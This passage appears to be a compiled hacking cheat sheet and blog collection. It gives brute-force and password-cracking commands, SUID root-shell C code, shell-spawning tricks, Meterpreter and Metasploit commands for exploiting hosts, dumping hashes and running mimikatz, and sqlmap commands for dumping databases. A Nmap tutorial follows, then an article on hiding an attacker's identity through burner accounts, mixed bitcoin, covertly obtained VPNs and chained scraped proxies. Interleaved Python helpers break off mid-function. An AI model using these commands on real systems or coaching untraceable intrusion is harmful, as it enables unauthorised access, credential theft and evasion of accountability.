    Search for SNMP servers with nmap, grepable output.
    nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
    (then grep)

    Passwords:
    Wordlists:
    Kali wordlists.
    /usr/share/wordlists

    Brute Forcing Services:
    Hydra FTP brute force.
    hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V

    Hydra POP3 brute force.
    hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V

    Hydra SMTP brute force.
    hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V

    Use -t to limit concurrent connections, example: -t 15

    Password Cracking:
    Password cracking penetration testing tools.

    John The Ripper – JTR:
    JTR password cracking.
    john --wordlist=/usr/share/wordlists/rockyou.txt hashes

    JTR forced descrypt cracking with wordlist.
    john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

    JTR forced descrypt brute force cracking.
    john --format=descrypt hash --show

    Windows Penetration Testing Commands:
    See Windows Penetration Testing Commands.

    Linux Penetration Testing Commands
    See Linux Commands Cheat Sheet in another post for a list of Linux Penetration testing commands, useful for local system enumeration.

    Compiling Exploits
    Some notes on compiling exploits.

    Identifying if C code is for Windows or Linux:
    C #includes will indicate which OS should be used to build the exploit.

    Windows exploit code.
    process.h, string.h, winbase.h, windows.h, winsock2.h

    Linux exploit code.
    arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
    sys/socket.h, sys/types.h, unistd.h

    Build Exploit GCC:
    Compile exploit gcc.

    Basic GCC compile.
    gcc -o exploit exploit.c

    GCC Compile 32Bit Exploit on 64Bit Kali:
    Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

    Cross compile 32 bit binary on 64 bit Linux
    gcc -m32 exploit.c -o exploit

    Compile Windows .exe on Linux:
    Build / compile windows exploits on Linux, resulting in a .exe file.

    Compile windows .exe on Linux
    i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

    SUID Binary:
    Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required.

    Below are some quick copy and paste examples for various shells (the includes are needed for setresuid and system to compile cleanly):

    SUID C Shell for /bin/bash:

    #define _GNU_SOURCE
    #include <stdlib.h>
    #include <unistd.h>

    int main(void){
        setresuid(0, 0, 0);
        system("/bin/bash");
    }

    SUID C Shell for /bin/sh:

    #define _GNU_SOURCE
    #include <stdlib.h>
    #include <unistd.h>

    int main(void){
        setresuid(0, 0, 0);
        system("/bin/sh");
    }

    Building the SUID Shell binary:
    gcc -o suid suid.c

    For 32 bit:
    gcc -m32 -o suid suid.c

    Reverse Shells:
    See Reverse Shell Cheat Sheet in another posts for a list of useful Reverse Shells.

    TTY Shells:
    Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

    Python TTY Shell Trick:
    python -c 'import pty;pty.spawn("/bin/bash")'
    echo os.system('/bin/bash')

    Spawn Interactive sh shell:
    /bin/sh -i

    Spawn Perl TTY Shell:
    exec "/bin/sh";
    perl -e 'exec "/bin/sh";'

    Spawn Ruby TTY Shell:
    exec "/bin/sh"

    Spawn Lua TTY Shell:
    os.execute('/bin/sh')

    Spawn TTY Shell from Vi:
    Run shell commands from vi:
    :!bash

    Spawn TTY Shell NMAP:
    !sh

    Metasploit Cheat Sheet:
    A basic metasploit cheat sheet that I have found handy for reference.

    Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

    Meterpreter Payloads:
    Windows reverse meterpreter payload:
    Windows reverse tcp payload.
    set payload windows/meterpreter/reverse_tcp

    Windows VNC Meterpreter payload:
    Meterpreter Windows VNC Payload.
    set payload windows/vncinject/reverse_tcp
    set ViewOnly false

    Linux Reverse Meterpreter payload:
    Meterpreter Linux Reverse Payload.
    set payload linux/meterpreter/reverse_tcp

    Meterpreter Cheat Sheet:
    Useful meterpreter commands.

    Meterpreter upload file to Windows target.
    upload file c:\\windows

    Meterpreter download file from Windows target.
    download c:\\windows\\repair\\sam /tmp

    Meterpreter run .exe on target – handy for executing uploaded exploits.
    execute -f c:\\windows\\temp\\exploit.exe

    Creates new channel with cmd shell.
    execute -f cmd -c

    Meterpreter show processes.
    ps

    Meterpreter get shell on the target.
    shell

    Meterpreter attempts privilege escalation on the target.
    getsystem

    Meterpreter attempts to dump the hashes on the target.
    hashdump

    Meterpreter create port forward to target machine.
    portfwd add -l 3389 -p 3389 -r target

    Meterpreter delete port forward.
    portfwd delete -l 3389 -p 3389 -r target

    Common Metasploit Modules:
    Top metasploit modules.

    Remote Windows Metasploit Modules (exploits)
    COMMAND DESCRIPTION:
    MS08_067 Windows 2k, XP, 2003 Remote Exploit.
    use exploit/windows/smb/ms08_067_netapi

    MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit.
    use exploit/windows/dcerpc/ms06_040_netapi

    MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit.
    use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

    Local Windows Metasploit Modules (exploits):
    COMMAND DESCRIPTION:
    Bypass UAC on Windows 7 (set target and arch, x86/x64).
    use exploit/windows/local/bypassuac

    Auxilary Metasploit Modules:
    COMMAND DESCRIPTION:
    Metasploit HTTP directory scanner.
    use auxiliary/scanner/http/dir_scanner

    Metasploit JBOSS vulnerability scanner.
    use auxiliary/scanner/http/jboss_vulnscan

    Metasploit MSSQL Credential Scanner.
    use auxiliary/scanner/mssql/mssql_login

    Metasploit MySQL Version Scanner.
    use auxiliary/scanner/mysql/mysql_version

    Metasploit Oracle Login Module.
    use auxiliary/scanner/oracle/oracle_login

    Metasploit Powershell Modules:
    COMMAND DESCRIPTION:
    Metasploit powershell payload delivery module.
    use exploit/multi/script/web_delivery

    Metasploit upload and run powershell script through a session.
    use post/windows/manage/powershell/exec_powershell

    Metasploit JBOSS deploy.
    use exploit/multi/http/jboss_maindeployer

    Metasploit MSSQL payload.
    use exploit/windows/mssql/mssql_payload

    Post Exploit Windows Metasploit Modules:
    Windows Metasploit Modules for privilege escalation.

    COMMAND DESCRIPTION:
    Metasploit show privileges of current user.
    run post/windows/gather/win_privs

    Metasploit grab GPP saved passwords.
    use post/windows/gather/credentials/gpp

    Metasploit load Mimikatz and dump wdigest credentials.
    load mimikatz
    wdigest

    Identify other machines that the supplied domain user has administrative access to.
    run post/windows/gather/local_admin_search_enum

    Automated dumping of sam file, tries to esc privileges etc.
    run post/windows/gather/smart_hashdump

    ASCII Table Cheat Sheet:
    Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

    HEX CHARACTER
    x00 Null Byte
    x08 BS
    x09 TAB
    x0a LF
    x0d CR
    x1b ESC
    x20 SPC
    x21 !
    x22 "
    x23 #
    x24 $
    x25 %
    x26 &
    x27 '
    x28 (
    x29 )
    x2a *
    x2b +
    x2c ,
    x2d -
    x2e .
    x2f /
    x30 0
    x31 1
    x32 2
    x33 3
    x34 4
    x35 5
    x36 6
    x37 7
    x38 8
    x39 9
    x3a :
    x3b ;
    x3c <
    x3d =
    x3e >
    x3f ?
    x40 @
    x41 A
    x42 B
    x43 C
    x44 D
    x45 E
    x46 F
    x47 G
    x48 H
    x49 I
    x4a J
    x4b K
    x4c L
    x4d M
    x4e N
    x4f O
    x50 P
    x51 Q
    x52 R
    x53 S
    x54 T
    x55 U
    x56 V
    x57 W
    x58 X
    x59 Y
    x5a Z
    x5b [
    x5c \
    x5d ]
    x5e ^
    x5f _
    x60 `
    x61 a
    x62 b
    x63 c
    x64 d
    x65 e
    x66 f
    x67 g
    x68 h
    x69 i
    x6a j
    x6b k
    x6c l
    x6d m
    x6e n
    x6f o
    x70 p
    x71 q
    x72 r
    x73 s
    x74 t
    x75 u
    x76 v
    x77 w
    x78 x
    x79 y
    x7a z

    CISCO IOS Commands:
    A collection of useful Cisco IOS commands.

    COMMAND DESCRIPTION:
    Enters enable mode.
    enable

    Short for, configure terminal.
    conf t

    Configure FastEthernet 0/0.
    (config)# interface fa0/0

    Add an IP address to fa0/0 (0.0.0.0 255.255.255.255 are placeholders for the address and mask).
    (config-if)# ip address 0.0.0.0 255.255.255.255

    Configure the vty (telnet/ssh) lines 0 to 4; this is entered from global config mode.
    (config)# line vty 0 4

    Require a password on the vty lines.
    (config-line)# login

    Set the telnet password.
    (config-line)# password YOUR-PASSWORD

    Show running config loaded in memory.
    # show running-config

    Show startup config.
    # show startup-config

    Show Cisco IOS version.
    # show version

    Display open sessions.
    # show session

    Show network interfaces.
    # show ip interface

    Show detailed interface info.
    # show interface e0

    Show routes.
    # show ip route

    Show access-lists.
    # show access-lists

    Show available file systems.
    # show file systems

    File information.
    # dir all-filesystems

    Show deleted files.
    # dir /all

    No limit on terminal output.
    # terminal length 0

    Copies running config to tftp server.
    # copy running-config tftp

    Save the running-config as the startup-config.
    # copy running-config startup-config

    Cryptography:
    Hash Lengths:
    HASH SIZE
    MD5 Hash Length 16 Bytes (32 hex characters)

    SHA-1 Hash Length 20 Bytes (40 hex characters)

    SHA-256 Hash Length 32 Bytes (64 hex characters)

    SHA-512 Hash Length 64 Bytes (128 hex characters)

    Note that NTLM (MD4 over the UTF-16LE password) is also 16 bytes, so a 32-character hex string could be either MD5 or NTLM; length alone does not identify the algorithm.

    Hash Examples:
    Likely just use hash-identifier for this but here are some example hashes:

    HASH EXAMPLE
    MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5

    MD5 $PASS:$SALT Example 01dfae6e5d4d90d9892622325959afbe:7050461

    MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426

    SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b

    SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014

    SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024

    SHA-256 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935

    SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 (salt not shown)

    SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617

    SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f

    SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd (salt not shown)

    SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a (salt not shown)

    NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b
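    To make the length table and the example hashes above concrete, here is an added Python example (written for this edit, not code from the original cheat sheet, from hashcat or from hash-identifier). It lists which algorithms a hex digest's length admits, then verifies a candidate password against a hash or hash:salt line in both salt orders, which is the question the $PASS:$SALT and $SALT:$PASS rows leave open. The unsalted example hashes above are hashcat's published test vectors, whose plaintext is the word hashcat, so they serve as input. NTLM is MD4 over the UTF-16LE password and MD4 is implemented here in pure Python because hashlib's md4 is often disabled under OpenSSL 3; the function names and the layout labels plain, pass+salt and salt+pass are this example's own, not hashcat mode names.

```python
import hashlib
import struct

# Digest sizes from the "Hash Lengths" table above, keyed by hex length because
# that is how hashes turn up in dumps. 32 hex chars is ambiguous: MD5 and NTLM
# (MD4 over UTF-16LE) both have 16-byte digests.
CANDIDATES_BY_HEX_LENGTH = {
    32: ("md5", "ntlm"),
    40: ("sha1",),
    64: ("sha256",),
    128: ("sha512",),
}

_MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 in pure Python (hashlib's md4 is frequently unavailable)."""
    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & _MASK32

    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as little-endian u64.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    round3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: words in order
            a = rotl((a + f(b, c, d) + x[i]) & _MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,9,13,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & _MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: bit-reversed word order
            a = rotl((a + h(b, c, d) + x[round3[i]] + 0x6ED9EBA1) & _MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & _MASK32, (b + bb) & _MASK32, (c + cc) & _MASK32, (d + dd) & _MASK32
    return struct.pack("<4I", a, b, c, d)


def digest_hex(algo: str, data: bytes) -> str:
    """Hex digest for one of the candidate algorithm names used in this example."""
    if algo == "ntlm":
        return md4(data.decode("utf-8").encode("utf-16le")).hex()
    return hashlib.new(algo, data).hexdigest()


def candidates(hash_hex: str):
    """Algorithms consistent with the digest length alone, i.e. what the table tells you."""
    return CANDIDATES_BY_HEX_LENGTH.get(len(hash_hex), ())


def _layouts(password: str, salt: str):
    """Bytes that get hashed for each layout; hashcat's $pass.$salt is 'pass+salt'."""
    pw, st = password.encode(), salt.encode()
    return {"plain": pw} if not salt else {"pass+salt": pw + st, "salt+pass": st + pw}


def make_hash_line(algo: str, password: str, salt: str = "", layout: str = "plain") -> str:
    """Build a hex or hex:salt line the way the examples above are written."""
    line = digest_hex(algo, _layouts(password, salt or "x")[layout] if salt else password.encode())
    return line + (":" + salt if salt else "")


def match_modes(password: str, hash_line: str):
    """Every (algorithm, layout) under which password produces hash_line.
    With a salt present both orders are tried, since the hex alone does not say
    whether the salt was appended or prepended; NTLM is never salted."""
    hash_hex, _, salt = hash_line.partition(":")
    hash_hex = hash_hex.lower()
    hits = []
    for algo in candidates(hash_hex):
        if algo == "ntlm" and salt:
            continue
        for layout, data in _layouts(password, salt).items():
            if digest_hex(algo, data) == hash_hex:
                hits.append((algo, layout))
    return hits


if __name__ == "__main__":
    # hashcat's published example hashes (also listed above); the plaintext is "hashcat".
    for line in ("8743b52063cd84097a65d1633f5c74f5", "b4b9b02e6f09a9bd760f388b67351e2b",
                 "b89eaac7e61417341b710b727768294d0e6a277b"):
        print(line, "length admits", candidates(line), "->", match_modes("hashcat", line))
```

    The point to take from the output is that the two 32-character examples are told apart only by actually hashing the candidate, never by length, and that a salted line needs both orders tried before you pick a hashcat mode.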

    SQLMap Examples:
    A mini SQLMap cheat sheet:

    COMMAND DESCRIPTION:
    Automated sqlmap scan.
    sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3

    Targeted sqlmap scan.
    sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"

    Scan a URL for union and error based injection with a MySQL backend, use a random user agent and dump the database.
    sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --technique=UE --random-agent --dump

    sqlmap check form for injection.
    sqlmap -o -u "http://meh.com/form/" --forms

    sqlmap dump and crack hashes for table users on database-name.
    sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump

    Nmap Basics part one: simple scan

    Welcome back to hacking a rise lads, Laughing Man here with a very basic rundown of some of the commands in Nmap, the free security scanner.

    What is the Nmap network scanner

    Nmap is a free and open-source network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. Find out more

    How to use Nmap

    First let me start by saying I already have Nmap installed on my system; most pentest distributions ship it (Kali, Parrot, Cyborg Hawk, BlackArch, ArchStrike etc.). On Termux type pkg install nmap to install it.

    To see all of Nmap's options type nmap on its own in a terminal, or man nmap for the manual page.

    Note

    Sometimes a scan comes back saying the host is down. This doesn't mean Nmap isn't working; it means the target didn't answer the host-discovery (ping) probes, which firewalls often drop. When that happens skip host discovery with -Pn, e.g. nmap -Pn google.com, or for an IP nmap -Pn 127.0.0.1.

    Simple scan

    The simplest scan is just nmap followed by the target, e.g. nmap 127.0.0.1. You won't normally be scanning localhost, so put the target's URL or IP there instead.

    Port scanning

    Now let's move on to finding the ports we need. To look for one specific port, here port 80, type nmap -p 80 127.0.0.1

    Scanning two ports at once is a comma-separated list: nmap -p 80,443 127.0.0.1

    To scan a range of ports give the range: nmap -p 1-9999 127.0.0.1. That is not every port though; TCP ports run up to 65535, so for a full scan use nmap -p 1-65535 127.0.0.1 or the shorthand nmap -p- 127.0.0.1.

    IP range

    Now we move on to scanning IP ranges, which helps you map a network and see what devices are on it. The main form is CIDR notation, e.g. nmap 127.0.0.1/28 (a /28 is 16 addresses) or a bigger block such as nmap 127.0.0.1/14 (262,144 addresses, so expect it to take a long time).

    If we want to see everyone on the local /24 we use nmap 127.0.0.*, which covers 127.0.0.0 to 127.0.0.255, 256 addresses in all.

    To leave a few IPs out of the scan use --exclude: nmap 127.0.0.* --exclude 127.0.0.1,127.0.0.2

    Top 20 ports

    You may ask yourself what the top 20 ports are. Nmap ranks ports by how often they are found open, and the top 20 are these:

    21/tcp ftp
    22/tcp ssh
    23/tcp telnet
    25/tcp smtp
    53/tcp domain
    80/tcp http
    110/tcp pop3
    111/tcp rpcbind
    135/tcp msrpc
    139/tcp netbios-ssn
    143/tcp imap
    443/tcp https
    445/tcp microsoft-ds
    993/tcp imaps
    995/tcp pop3s
    1723/tcp pptp
    3306/tcp mysql
    3389/tcp ms-wbt-server
    5900/tcp vnc
    8080/tcp http-proxy

    The command nmap --top-ports 20 127.0.0.1 scans exactly that list and reports which of them are open and which are closed.
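    As an added example (written for this edit, not part of the original post or of Nmap itself), the Python below expands the target and port notations used above the way Nmap interprets them, so you can see how many hosts a /28, a /14 or a wildcard really covers before launching a scan, and assembles the matching command line. The -p, -p-, --top-ports, --exclude and -Pn flags are real Nmap syntax; the helper names are this example's own.

```python
import ipaddress
import shlex

MAX_PORT = 65535


def _normalize(target: str) -> str:
    """Map nmap's last-octet wildcard (10.0.0.*) onto the /24 it stands for."""
    return target[:-2] + ".0/24" if target.endswith(".*") else target


def expand_ports(spec: str):
    """Expand an nmap -p argument: "80", "80,443", "1-9999", or "-" for every port."""
    if spec == "-":
        return list(range(1, MAX_PORT + 1))
    ports = []
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        first = int(lo)
        last = int(hi) if hi else first
        if not 1 <= first <= last <= MAX_PORT:
            raise ValueError(f"bad port spec {part!r}")
        ports.extend(range(first, last + 1))
    return ports


def host_count(target: str) -> int:
    """Addresses a target covers: a /28 is 16, a /24 (or wildcard) 256, a /14 is 2**18."""
    return ipaddress.ip_network(_normalize(target), strict=False).num_addresses


def expand_targets(target: str, exclude=()):
    """Every address in the target, as strings, minus the --exclude list.
    The wildcard covers .0 through .255, i.e. 256 hosts, not 1 to 256;
    strict=False lets 127.0.0.1/28 stand for the block 127.0.0.0/28."""
    net = ipaddress.ip_network(_normalize(target), strict=False)
    excluded = {ipaddress.ip_address(e) for e in exclude}
    return [str(ip) for ip in net if ip not in excluded]


def build_command(target: str, ports=None, top_ports=None, exclude=(), skip_ping=False):
    """Assemble the nmap argv for the scans shown in this post."""
    argv = ["nmap"]
    if skip_ping:
        argv.append("-Pn")  # skip host discovery: scan even when the ping probes are dropped
    if ports:
        argv += ["-p", ports]
    if top_ports:
        argv += ["--top-ports", str(top_ports)]
    if exclude:
        argv += ["--exclude", ",".join(exclude)]
    argv.append(target)
    return argv


if __name__ == "__main__":
    for t in ("127.0.0.1/28", "127.0.0.1/14", "127.0.0.*"):
        print(f"{t:13} covers {host_count(t)} addresses")
    excl = ["127.0.0.1", "127.0.0.2"]
    print(shlex.join(build_command("127.0.0.*", exclude=excl, skip_ping=True)),
          "->", len(expand_targets("127.0.0.*", excl)), "hosts")
```

    Run it before a large scan: the host count tells you whether a /14 is a realistic target list, and the argv is what to hand to subprocess if you wrap Nmap from Python.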

    Right lads, we'll leave it at that; I'm going for a coffee and enjoying the rest of my Father's Day lol whoop whoop

    ALL THE BEST LAUGHINGMAN

    Friday, June 14, 2019

    pentestinfra a new way to stay anon online

    Welcome to hacking a rise, today is a real treat as our very own Shiva made pentestinfra, a way to anonymise your network without Tor or a VPN. This tool is going to give 4nonimizer a run for its money; to find out more check Shiva's blog CLICK HERE

    Introduction
    This is the first part of a series on how to build a covert pentesting infrastructure. Part 1 focuses on setting up the attacker's localhost so that it can connect covertly to the attack VPS / cloud server using a mix of SOCKS5 proxies, DNS proxies and a VPN. The knowledge in these articles comes in handy for red teaming or engagements that require anonymity. As a reader you will learn a state-of-the-art method to build a pentesting infrastructure. The article series is as follows:

    Part 1: Attacker Localhost Setup (This article)
    Part 2: Work VPS /Cloud Installation and Setup
    Part 3: Custom Attack / Exploitation Software
    See the below illustration to get an overview of this project. Part 1 covers “Hacker Host”, Proxies and VPN.

    Hacking A Rise anon_infra

    The last chapter “Surf” includes a large reference of links, should the reader be interested.

    Attacker Localhost Setup
    The attacker’s localhost is the machine that must never be compromised or traced as it will reveal the identity of the operating agent. One could argue that part 1 is therefore the most important of the 3 parts.

    Check List
    A short primer checklist before the actual deep dive into technical anonymity:

    Change the MAC address of network cards using "macchanger"
    Close all apps and background services connected to the web (check with netstat)
    All tracking in browser and OS is turned off and blocked (hardened)³³⁻³⁶
    Bitcoins are properly mixed and held in a third-party wallet
    Connect through (multiple) scraped anonymous SOCKS5 proxies and a secured DNS proxy
    Connect to a logless VPN that was obtained covertly
    Connect to the internet through Tor Browser or another browser that does not allow fingerprinting
    DNS settings are configured to use a logless DNS
    Logged out of all online accounts
    Emails are sent using burner accounts
    New accounts are registered and logged in with burner emails
    Search with DuckDuckGo or StartPage
    Use foreign hardware if at all possible, and preferably not your neighbour's WiFi.*
    *Note that WiFi hotspots in e.g. cafés often use more tracking than the average 4G data connection.

    Scraping Proxies
    In order to set up a proxy server (see the Redsocks chapter) with random proxies, some proxies must first be fetched. This is done with the tool "fetch-some-proxies"¹. Simply run ./fetch.sh, which executes the following commands:

    sudo python fetch-some-proxies/fetch.py | tee proxyscrape.tmp
    sudo grep -e "elite" proxyscrape.tmp > proxyscrape2.tmp
    sudo grep -e "socks5" proxyscrape2.tmp > proxyscrape.lst
    rm proxyscrape*.tmp
    cat proxyscrape.lst
    Only SOCKS5 proxies of the elite (high-anonymity) type are of interest, as several protocols must be routed through the proxy with as much anonymity as possible.

    Hacking A Rise fetching

    As unwanted proxies are now filtered away, a proxy with short latency is chosen from “proxyscrape.lst”, e.g. socks5://178.62.59.71:4076 . Now that the proxy list is populated, the next chapter will show how to use a scraped proxy with redsocks.

    Redsocks Install & Setup
    “Redsocks is the tool that allows you to proxify (redirect) network traffic through a SOCKS4, SOCKS5 or HTTPs proxy server. It works on the lowest level, the kernel level (iptables). The other possible way is to use application level proxy, when the proxy client is implemented in the same language as an application is written in. Redsocks operates on the lowest system level, that’s why all running applications don’t even have an idea that network traffic is sent through a proxy server, as a result it is called a transparent proxy redirector.” ¹⁴

    Hacking A Rise redsocks-diagram

    sudo apt-get install redsocks
    sudo nano /etc/redsocks.conf
    Then insert the redsocks.conf contents given below and continue:

    sudo redsocks -c /etc/redsocks.conf
    redsocks.conf :

    base {
    log_debug = on;
    log_info = on;
    log = "stderr";
    daemon = off;
    redirector = iptables;
    }

    redsocks {
    local_ip = 127.0.0.1;
    local_port = 12345;

    // socks5://178.62.59.71:4076
    ip = 178.62.59.71;
    port = 4076;
    type = socks5;
    // known types: socks4, socks5, http-connect, http-relay

    // login = username;
    // password = password;
    }

    dnstc {
    // fake and really dumb DNS server that returns "truncated answer" to
    // every query via UDP, RFC-compliant resolver should repeat same query
    // via TCP in this case.
    local_ip = 127.0.0.1;
    local_port = 5300;
    }

    // you can add more `redsocks' and `redudp' sections if you need.

    This concludes the installation and setup of redsocks. However, to route all traffic through redsocks and the scraped proxy, iptables rules are required. For installing iptables and setting it up with redsocks refer to the debian manpages¹⁵ and stackexchange¹⁴. In any case, using the script included with this project both redsocks and iptables can be started with "./startREDsocks.sh":

    #!/usr/bin/env bash
    sudo ./restartDNScrypt.sh
    sudo ./iproute.sh
    echo "Starting redsocks..."
    sudo redsocks -c /etc/redsocks.conf
    sudo ./resetiproute.sh
    sudo ./myip.sh
    While DNScrypt and secure DNS in general will be covered in the next chapter “Secure DNS”, ./iproute.sh routes traffic through redsocks proxy with iptables and “./resetiproute.sh” stops the routing through redsocks. A closer look:

    #!/usr/bin/env bash
    echo "Routing selected ports through redsocks proxy"
    echo " "

    # Create the REDSOCKS chain and let local, private, link-local and
    # multicast destinations through untouched.
    sudo iptables -t nat -N REDSOCKS
    sudo iptables -t nat -A REDSOCKS -d 0.0.0.0/8 -j RETURN
    sudo iptables -t nat -A REDSOCKS -d 10.0.0.0/8 -j RETURN
    sudo iptables -t nat -A REDSOCKS -d 127.0.0.0/8 -j RETURN
    sudo iptables -t nat -A REDSOCKS -d 169.254.0.0/16 -j RETURN
    sudo iptables -t nat -A REDSOCKS -d 172.16.0.0/12 -j RETURN
    sudo iptables -t nat -A REDSOCKS -d 192.168.0.0/16 -j RETURN
    sudo iptables -t nat -A REDSOCKS -d 224.0.0.0/4 -j RETURN
    sudo iptables -t nat -A REDSOCKS -d 240.0.0.0/4 -j RETURN

    # Everything else that reaches the chain is handed to redsocks on 12345.
    sudo iptables -t nat -A REDSOCKS -p tcp -j REDIRECT --to-ports 12345

    # Only TCP on these four ports is sent through the proxy. UDP, and with it
    # DNS on port 53, is not, which is the DNS leak addressed in "Secure DNS".
    sudo iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDSOCKS
    sudo iptables -t nat -A OUTPUT -p tcp --dport 80 -j REDSOCKS
    sudo iptables -t nat -A OUTPUT -p tcp --dport 22 -j REDSOCKS
    sudo iptables -t nat -A OUTPUT -p tcp --dport 21 -j REDSOCKS

    # PREROUTING only matters for traffic forwarded from other hosts.
    sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDSOCKS
    sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDSOCKS
    sudo iptables -t nat -A PREROUTING -p tcp --dport 21 -j REDSOCKS
    sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDSOCKS
    Note that depending on which ports should be forwarded it might be necessary to add or change the dport lines. As for "resetiproute.sh", it works like so:

    #!/usr/bin/env bash
    echo "Resetting iptables, i.e. stop routing through redsocks proxy"
    echo " "
    # Flush all rules, delete user chains and zero counters in the filter and nat tables.
    sudo iptables -F
    sudo iptables -X
    sudo iptables -Z
    sudo iptables -t nat -F
    sudo iptables -t nat -X
    sudo iptables -t nat -Z
    # redsocks was started with sudo, so it must be killed with sudo as well.
    sudo killall redsocks
    For more information on iptables please refer to “How to force all Linux apps to use SOCKS proxy” ¹².

    Redsocks with Multiple Proxies
    Adding additional proxies to redsocks doesn't necessarily lead to higher anonymity or security, as the proxies are not chained and DNS still leaks, but it helps balance the load. As before, "/etc/redsocks.conf" must be edited, this time with additional sections, like so:

    **More proxies**
    redsocks {
    local_ip = 127.0.0.1; ip = 127.0.0.1; type = socks5;
    local_port = 11080;
    port = 1080;
    }
    redsocks {
    local_ip = 127.0.0.1; ip = 127.0.0.1; type = socks5;
    local_port = 11081;
    port = 1081;
    }
    redsocks {
    local_ip = 127.0.0.1; ip = 127.0.0.1; type = socks5;
    local_port = 11082;
    port = 1082;
    }
    Furthermore, "iproute.sh" needs to be updated accordingly. The match module is statistic (there is no random match in current iptables), and the rules are evaluated in order, so each rule only sees the packets the rules before it did not take: with three proxies the first rule takes 1/3, the second takes 1/2 of the remaining 2/3, and the last rule takes the rest without any statistic match. Using 1/3 on both of the first two rules would give the three proxies 1/3, 2/9 and 4/9 of the traffic instead of an even split.

    iptables … -m statistic --mode random --probability 0.3333333333 -j REDIRECT --to-ports 11080
    iptables … -m statistic --mode random --probability 0.5 -j REDIRECT --to-ports 11081
    iptables … -j REDIRECT --to-ports 11082
    Now enjoy seamless proxy rotation.
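    As an added example (written for this edit, not part of the original article or of redsocks), the Python below generates the extra redsocks sections for a list of upstream SOCKS5 proxies plus the matching REDIRECT rules, and works through the probability arithmetic that makes the split even, so it serves both the single-proxy redsocks.conf above and this multi-proxy setup. The proxy addresses in the demo are constructed placeholders; the only assumptions are that the rules are appended in order to the REDSOCKS chain created by iproute.sh and that local ports start at 11080 as in the article.

```python
def rule_probabilities(n: int):
    """Per-rule probabilities for n sequential `-m statistic --mode random`
    rules that should each end up with a 1/n share. Rule i only sees the
    packets rules 0..i-1 did not take, so it needs 1/(n-i), not 1/n. The last
    rule needs no match at all and takes whatever is left (returned as None)."""
    if n < 1:
        raise ValueError("need at least one proxy")
    return [1.0 / (n - i) for i in range(n - 1)] + [None]


def effective_shares(probs):
    """Share of traffic each rule actually receives for the given per-rule
    probabilities, i.e. what the kernel does when evaluating them in order."""
    remaining, shares = 1.0, []
    for p in probs:
        if p is None:
            shares.append(remaining)
            break
        shares.append(remaining * p)
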